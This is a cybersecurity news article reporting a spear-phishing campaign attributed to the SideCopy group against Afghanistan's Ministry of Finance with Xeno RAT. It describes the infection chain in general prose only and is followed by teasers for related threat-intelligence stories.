Threat Intelligence SideCopy group targets Afghanistan’s Ministry of Finance with Xeno RAT June 2, 2026 Share By SC Staff (Adobe Stock) As reported by The Hacker News, a spear-phishing campaign, likely orchestrated by the Pakistan-aligned SideCopy group, has been identified targeting Afghanistan's Ministry of Finance with the open-source remote access trojan Xeno RAT. This operation, codenamed Operation XENOFISCAL and analyzed by Seqrite Labs, also ensnared provincial revenue and finance directorates, along with Pashto-speaking government officials. The campaign commences with a spear-phishing email containing a ZIP archive with a malicious LNK file written in Pashto, designed to exploit the familiarity of the language within the Afghan government. Upon execution, the LNK file uses mshta.exe to download a remote HTML Application (HTA) from a compromised Afghan education domain, leading to the execution of obfuscated JavaScript. The malware then establishes persistence by mimicking Microsoft Edge, dropping Xeno RAT 1.8.7 and a decoy document via a DLL loader. Xeno RAT is capable of remote command execution, data exfiltration, network tunneling, and system monitoring, including keystroke logging and screenshot capture. SideCopy, part of the broader Transparent Tribe (APT36) umbrella, has previously targeted Indian entities with similar malware. This campaign represents a continuation of malicious cyber activity focused on South Asian targets. Source: The Hacker News SC Staff Related Threat Intelligence Russian hackers exploit WinRAR vulnerability for data theft SC Staff June 2, 2026 The exploitation chain begins with a weaponized HTML Application payload called GammaPhish, which retrieves intermediate Visual Basic Script (VBScript) downloaders known as GammaLoad, according to Sekoia. Threat Intelligence Crypto whales and executives face rising physical attacks SC Staff June 1, 2026 The public ledger that underpins cryptocurrency, while enabling transparency, also exposes wealthy holders, known as whales, to identification and targeting by hackers and con artists. Threat Intelligence Digital Intelligence Lab launches observatory to connect cyber events with geopolitical context SC Staff June 1, 2026 The DIL Observatory maps cyber incidents, including ransomware attacks, data breaches, and cyber militia activity, alongside their geopolitical and social contexts. Related Events Cybercast Better Threat Intelligence Between Public and Private Sectors On-Demand Event Virtual Conference Nationwide Cybersecurity Summit 2025: Safeguarding America’s Digital Future On-Demand Event Virtual Conference Securing the Future of Finance: Strategies to Counter Modern Cyber Threats On-Demand Event Get daily email updates SC Media's daily must-read of the most current and pressing daily news Business Email By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy . Subscribe Related Terms Brute Force Defacement Denial of Service Dictionary Attack Distributed Scans Domain Hijacking Hybrid Attack Information Warfare Password Cracking Reconnaissance You can skip this ad in 5 seconds